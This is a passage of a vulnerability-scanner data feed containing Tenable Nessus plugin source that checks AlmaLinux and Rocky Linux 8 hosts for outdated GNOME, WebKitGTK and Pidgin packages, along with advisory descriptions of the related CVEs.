script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8689\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-8735\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gdk-pixbuf2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gdk-pixbuf2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gdk-pixbuf2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gdk-pixbuf2-xlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gdk-pixbuf2-xlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gnome-desktop3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:gnome-desktop3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(release) || 'AlmaLinux' >!< release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gdk-pixbuf2 / gdk-pixbuf2-devel / gdk-pixbuf2-modules / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-12T13:32:59", "description": "The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2019:3553 advisory.\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF image files. (CVE-2019-11459)\n\n - daemon/gvfsdaemon.c in gvfsd from GNOME gvfs before 1.38.3, 1.40.x before 1.40.2, and 1.41.x before 1.41.3 opened a private D-Bus server socket without configuring an authorization rule. A local attacker could connect to this server socket and issue D-Bus method calls. (Note that the server socket only accepts a single connection, so the attacker would have to discover the server and connect to the socket before its owner does.) (CVE-2019-12795)\n\n - It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard shortcuts, and potentially other actions. (CVE-2019-3820)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8672, CVE-2019-8676, CVE-2019-8689)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8726, CVE-2019-8735)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-11-07T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : GNOME (RLSA-2019:3553)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-11459", "CVE-2019-12795", "CVE-2019-3820", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768"], "modified": "2023-11-07T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:gdk-pixbuf2", "p-cpe:/a:rocky:linux:gdk-pixbuf2-debuginfo", "p-cpe:/a:rocky:linux:gdk-pixbuf2-debugsource", "p-cpe:/a:rocky:linux:gdk-pixbuf2-devel", "p-cpe:/a:rocky:linux:gdk-pixbuf2-devel-debuginfo", "p-cpe:/a:rocky:linux:gdk-pixbuf2-modules", "p-cpe:/a:rocky:linux:gdk-pixbuf2-modules-debuginfo", "p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib", "p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib-debuginfo", "p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib-devel", "p-cpe:/a:rocky:linux:gnome-desktop3", "p-cpe:/a:rocky:linux:gnome-desktop3-debuginfo", "p-cpe:/a:rocky:linux:gnome-desktop3-debugsource", "p-cpe:/a:rocky:linux:gnome-desktop3-devel", "p-cpe:/a:rocky:linux:libpurple", "p-cpe:/a:rocky:linux:libpurple-debuginfo", "p-cpe:/a:rocky:linux:libpurple-devel", "p-cpe:/a:rocky:linux:pango", "p-cpe:/a:rocky:linux:pango-debuginfo", "p-cpe:/a:rocky:linux:pango-debugsource", "p-cpe:/a:rocky:linux:pango-devel", "p-cpe:/a:rocky:linux:pidgin", "p-cpe:/a:rocky:linux:pidgin-debuginfo", "p-cpe:/a:rocky:linux:pidgin-debugsource", "p-cpe:/a:rocky:linux:pidgin-devel", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2019-3553.NASL", "href": "https://www.tenable.com/plugins/nessus/184895", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2019:3553.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(184895);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/07\");\n\n script_cve_id(\n \"CVE-2019-3820\",\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8518\",\n \"CVE-2019-8523\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8666\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8679\",\n \"CVE-2019-8681\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8726\",\n \"CVE-2019-8735\",\n \"CVE-2019-8768\",\n \"CVE-2019-11070\",\n \"CVE-2019-11459\",\n \"CVE-2019-12795\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"RLSA\", value:\"2019:3553\");\n\n script_name(english:\"Rocky Linux 8 : GNOME (RLSA-2019:3553)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nRLSA-2019:3553 advisory.\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in\n GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to\n uninitialized memory use when processing certain TIFF image files. (CVE-2019-11459)\n\n - daemon/gvfsdaemon.c in gvfsd from GNOME gvfs before 1.38.3, 1.40.x before 1.40.2, and 1.41.x before 1.41.3\n opened a private D-Bus server socket without configuring an authorization rule. A local attacker could\n connect to this server socket and issue D-Bus method calls. (Note that the server socket only accepts a\n single connection, so the attacker would have to discover the server and connect to the socket before its\n owner does.) (CVE-2019-12795)\n\n - It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all\n contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard\n shortcuts, and potentially other actions. (CVE-2019-3820)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686,\n CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8672, CVE-2019-8676, CVE-2019-8689)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8726, CVE-2019-8735)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2019:3553\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1662193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1667136\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1673011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1674382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1679127\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1680164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1685811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1687949\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1690506\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1696708\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1698520\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1698884\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1698923\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1698929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1698930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1704355\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1704360\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1704378\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1705583\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1706793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1709937\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1713080\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1713330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1713453\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1713685\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1715738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1715761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1715765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1716295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1716771\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1718133\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1719241\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1719279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1719779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1720481\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1721195\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1721575\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1722047\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1722844\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1723467\");\n script_set_attribute(attribute:\"see_also\", 